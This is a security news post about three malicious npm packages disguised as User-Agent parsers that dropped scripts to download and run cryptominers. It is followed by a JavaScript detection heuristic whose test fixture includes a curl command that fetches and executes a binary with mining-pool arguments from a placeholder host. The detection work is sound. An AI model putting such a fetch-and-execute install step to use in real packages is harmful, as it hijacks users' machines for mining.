Malicious NPM packages run cryptominer on Windows, macOS and Linux systems

The packages were uploaded to the repository on October 15, but were immediately identified by researchers.


Sonatype discovered cryptocurrency mining software in three JavaScript libraries uploaded to the official NPM repository.

Malicious packages called okhsa, klow and klown were disguised as User-Agent header parsers and uploaded by the same author on October 15th. The malicious packages were noticed almost immediately by researchers who reported them to the NPM administration. The administration promptly removed the malicious packages from the repository, but by that time they had already been downloaded more than 150 times in total.

Only the klow and klown packages, which were used as dependencies of the okhsa package, contained malicious code.

As the experts explained, depending on the platform (Windows or a Unix-like system), a .bat or .sh script was dropped onto the user's system; it downloaded EXE or Linux ELF files from an external host and executed them with arguments specifying the mining pool, the cryptocurrency wallet address and the number of processor threads to use.
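As an added illustration (not Sonatype's or NPM's code), the heuristic below scans an unpacked npm package for the chain just described: an install-time lifecycle hook, OS-dependent branching, a download step, process execution, and mining-pool style arguments. The manifest, file contents and the rule set are all constructed for this example.

```javascript
// Added example: heuristic scan of an npm package for the dropper pattern
// described in the post. All sample data below is constructed.
const LIFECYCLE = ["preinstall", "install", "postinstall"];

// Each rule: an id, a regex tested against file contents, and a short reason.
const RULES = [
  { id: "platform-branch", re: /process\.platform|os\.platform\(\)/, why: "branches on host OS" },
  { id: "dropper-script",  re: /\.(bat|cmd|sh)\b/, why: "stages a .bat/.sh script" },
  { id: "download",        re: /\b(curl|wget|Invoke-WebRequest|https?\.get)\b/, why: "fetches remote content" },
  { id: "exec",            re: /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(/, why: "executes a process" },
  { id: "miner-args",      re: /stratum\+tcp|--pool|--threads|--wallet/, why: "mining pool/wallet/thread arguments" },
];

// manifest: parsed package.json; files: { path: contents } of the unpacked tarball.
function scanPackage(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE) {
    if (scripts[hook]) findings.push({ id: "lifecycle-hook", where: hook, why: `runs "${scripts[hook]}" at install time` });
  }
  for (const [path, text] of Object.entries(files)) {
    for (const r of RULES) if (r.re.test(text)) findings.push({ id: r.id, where: path, why: r.why });
  }
  return findings;
}

// Verdict: hook + platform branch + download + exec is the full dropper chain;
// miner-style arguments on top of that point at a cryptominer payload.
function verdict(findings) {
  const ids = new Set(findings.map(f => f.id));
  const chain = ["lifecycle-hook", "platform-branch", "download", "exec"].every(id => ids.has(id));
  if (chain && ids.has("miner-args")) return "likely-cryptominer-dropper";
  if (chain) return "dropper-chain";
  return ids.size ? "review" : "clean";
}

// Constructed fixture mirroring the described behaviour; the URL is a placeholder
// and nothing here is executed, only pattern-matched.
const SAMPLE_MANIFEST = { name: "ua-parser-sample", scripts: { preinstall: "node setup.js" } };
const SAMPLE_FILES = {
  "setup.js": [
    "const { execSync } = require('child_process');",
    "const script = process.platform === 'win32' ? 'run.bat' : 'run.sh';",
    "execSync(`curl -o bin http://example.invalid/x && ./bin --pool stratum+tcp://example.invalid --threads 4`);",
  ].join("\n"),
};

console.log(verdict(scanPackage(SAMPLE_MANIFEST, SAMPLE_FILES)), scanPackage(SAMPLE_MANIFEST, SAMPLE_FILES));
```

Such rules are a triage aid for reviewing newly published packages; a clean verdict only means none of these constructed patterns matched.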

Recall that in July of this year, two malicious NPM packages were found in the NPM repository, capable of stealing credentials from Google Chrome browsers on Windows systems, as well as installing a backdoor for further spyware activity.